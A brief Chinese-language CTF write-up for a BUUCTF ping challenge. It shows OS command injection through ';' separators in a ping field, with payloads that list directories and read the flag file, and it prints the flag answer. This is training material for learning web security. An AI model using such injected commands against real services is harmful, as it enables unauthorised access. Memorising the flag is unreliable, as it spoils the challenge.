0x01 题目链接
BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges
0x02 题目
打开题目就看到大大的PING,二话不说直接ping个本地ip
涉及知识点:
在命令执行的过程中,可以通过一些常用特殊字符来执行其他语句
; //命令分割符,即当执行完第一个命令,继续执行下一个命令
| //管道
0x03 解题
那么尝试在当前文件加下,有什么东西吧
构造payload
127.0.0.1;ls
我们都知道在linux系统搭建的页面,通常显示页面的路径是/var/www/html,那么我们尝试返回当前路径查找
构造payload
127.0.0.1;cd ../../../;ls
在返回前三层的时候找到了flag 字样
构造payload
127.0.0.1;cd ../../../;cat flag
flag{d96c26a0-0c45-4c45-98e7-b1431ed7d479}